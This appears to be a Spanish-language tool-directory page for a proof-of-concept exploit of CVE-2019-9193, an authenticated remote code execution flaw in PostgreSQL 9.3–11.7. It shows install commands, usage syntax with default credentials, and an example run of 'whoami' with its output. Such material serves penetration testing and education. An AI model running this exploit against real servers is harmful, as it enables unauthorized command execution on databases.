Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2019-9193 — es una herramienta PoC diseñada para explotar una vulnerabilidad autenticada de ejecución remota de código (RCE) en versiones específicas de PostgreSQL (9.3 - 11.7) | Kitploit
Herramientas/GitHubGitHub/geniuszly/cve-2019-9193
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHubgeniuszly/cve-2019-9193

CVE-2019-9193

es una herramienta PoC diseñada para explotar una vulnerabilidad autenticada de ejecución remota de código (RCE) en versiones específicas de PostgreSQL (9.3 - 11.7)

Ver Repositorio
41hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

GenPostgresRCEExploit es una herramienta PoC diseñada para explotar una vulnerabilidad de Ejecución Remota de Código (RCE) autenticada en versiones específicas de PostgreSQL (9.3 - 11.7). Permite a usuarios autenticados ejecutar comandos del sistema en un servidor de base de datos PostgreSQL que sea vulnerable a CVE-2019-9193.

Características

  • Explotación de RCE: Ejecuta comandos del sistema a través de una sesión autenticada de PostgreSQL.
  • Verificación de versión: Valida la versión del servidor PostgreSQL objetivo para confirmar la vulnerabilidad.
  • Ejecución de comandos: Permite la ejecución de comandos personalizados en el servidor si es vulnerable.
  • Gestión automática de tablas: Crea y elimina una tabla temporal para la ejecución de comandos sin intervención manual.

Requisitos

  • Python 3.x
  • Librería cliente de PostgreSQL (paquete psycopg2)

Instalación

  1. Clona el repositorio:
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2019-9193
    cd CVE-2019-9193
    
  2. Instala los paquetes necesarios:
    root@kitploit:~
    pip install -r requirements.txt
    

Uso

root@kitploit:~
python3 GenPostgresRCEExploit.py -i <ip_objetivo> -p <puerto> -d <nombre_base_datos> -U <usuario> -P <contraseña> -c "<comando_sistema>"

Opciones

  • -i, --ip: Dirección IP del servidor PostgreSQL (Por defecto: 127.0.0.1)
  • -p, --port: Puerto del servidor PostgreSQL (Por defecto: 5432)
  • -d, --database: Nombre de la base de datos PostgreSQL (Por defecto: template1)
  • -U, --user: Nombre de usuario para conectarse al servidor PostgreSQL (Por defecto: postgres)
  • -P, --password: Contraseña para conectarse al servidor PostgreSQL (Por defecto: postgres)
  • -c, --command: Comando del sistema a ejecutar en el servidor
  • -t, --timeout: Tiempo de espera de conexión en segundos (Por defecto: 10)

Ejemplo

root@kitploit:~
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c "whoami"

Este ejemplo se conecta a un servidor PostgreSQL en 192.168.1.10, se autentica con las credenciales proporcionadas y ejecuta el comando whoami.

Salida de ejemplo

root@kitploit:~
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c "whoami"

[+] Conectando a la base de datos PostgreSQL en 192.168.1.10:5432
[+] Conexión establecida exitosamente
[+] Verificando versión de PostgreSQL
[+] Versión vulnerable de PostgreSQL detectada: 10.4
[+] Creando tabla temporal: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Comando ejecutado exitosamente

postgres

Descargo de responsabilidad

Esta herramienta está destinada únicamente a fines educativos y pruebas éticas. El uso no autorizado de esta herramienta contra cualquier sistema es ilegal y está estrictamente prohibido. Los autores no se responsabilizan por cualquier uso indebido.

Descargar herramienta